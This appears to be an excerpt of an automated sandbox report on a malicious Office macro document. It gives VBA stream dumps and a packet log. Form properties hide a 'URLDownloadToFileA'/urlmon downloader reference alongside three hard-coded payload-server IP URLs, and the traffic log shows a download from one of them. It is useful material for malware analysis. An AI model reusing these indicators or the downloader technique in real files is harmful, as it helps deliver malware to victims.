                Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
                File Type:data
                Stream Size:97
                Entropy:3.61064918306
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
                File Type:ASCII text, with CRLF line terminators
                Stream Size:301
                Entropy:4.64742015018
                Base64 Encoded:True
                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
                Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/f
                File Type:data
                Stream Size:263
                Entropy:3.59027175124
                Base64 Encoded:False
                Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
                Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
                Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
                General
                Stream Path:_VBA_PROJECT_CUR/UserForm1/o
                File Type:data
                Stream Size:272
                Entropy:3.7315998228
                Base64 Encoded:True
                Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
                Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:3819
                Entropy:4.49037503963
                Base64 Encoded:False
                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                File Type:data
                Stream Size:2035
                Entropy:3.42846113886
                Base64 Encoded:False
                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
                Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                File Type:data
                Stream Size:138
                Entropy:1.48462480805
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                File Type:data
                Stream Size:264
                Entropy:1.9985725068
                Base64 Encoded:False
                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
                Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                File Type:data
                Stream Size:256
                Entropy:1.80540314317
                Base64 Encoded:False
                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                File Type:SVR2 executable (USS/370) not stripped - version 12587540
                Stream Size:865
                Entropy:6.55213343791
                Base64 Encoded:True
                Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
                Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Sep 24, 2021 17:26:57.760240078 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:57.962141037 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:57.962239027 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:57.963424921 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:58.164875984 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.014862061 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.014928102 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.014966965 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015007019 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015043974 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015094995 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015166998 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015211105 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015228987 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.015249968 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015253067 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.015256882 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.015290022 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.015290976 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.015327930 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.025497913 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218410015 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218455076 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218481064 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218508959 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218534946 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218561888 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218589067 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218616962 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218636990 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218663931 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218668938 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218689919 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218708038 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218715906 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218734980 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218741894 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218770981 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218776941 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218806028 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218807936 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218827963 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.218833923 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.218879938 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.219007015 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.221445084 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.221627951 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.221698999 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.221760035 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.221821070 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.221838951 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.221888065 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.221894026 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.221899033 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.224092007 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434200048 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434273958 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434330940 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434381962 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434434891 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434497118 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434561968 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434611082 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434608936 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434643984 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434650898 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434655905 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434663057 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434715033 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434730053 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434765100 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434772968 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434814930 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434828043 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434864044 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434869051 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434922934 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434927940 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.434973001 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.434988976 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435026884 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435026884 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435080051 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435085058 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435139894 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435168982 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435220957 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435230970 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435272932 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435276985 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435322046 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435336113 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435372114 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435375929 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435431004 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435431957 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435487032 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435503006 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435534954 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435549021 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435585976 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435589075 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435641050 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435643911 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435691118 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435691118 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435743093 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435749054 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435791969 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435798883 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435848951 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435852051 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435904980 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.435911894 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.435957909 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.437814951 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.437864065 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.437916994 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.437930107 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.437964916 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.437989950 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.438009024 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.438070059 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.438117027 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.438173056 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.438124895 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.438210964 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.438220978 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.438229084 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.438251019 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.438347101 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.449615002 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652148962 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652226925 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652278900 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652322054 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652348995 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652359962 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652390957 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652396917 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652400017 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652403116 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652437925 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652455091 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652477980 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652493954 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652518034 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652535915 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652556896 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652581930 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652602911 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652606010 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652648926 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652653933 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652687073 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652698040 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652724028 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652739048 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652762890 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652781010 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652800083 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.652806044 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.652862072 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.654351950 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.654747009 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.654828072 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.654835939 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.654906988 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.654962063 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.654999018 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.654994011 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655018091 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655036926 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655050993 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655076981 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655100107 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655109882 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655136108 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655137062 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655183077 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655204058 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655220985 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655260086 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655308008 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655313015 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655350924 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655389071 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655389071 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655400991 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655406952 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655451059 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655464888 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655492067 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655492067 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655529022 CEST8049167190.14.37.173192.168.2.22
                Sep 24, 2021 17:26:59.655534029 CEST4916780192.168.2.22190.14.37.173
                Sep 24, 2021 17:26:59.655567884 CEST8049167190.14.37.173192.168.2.22
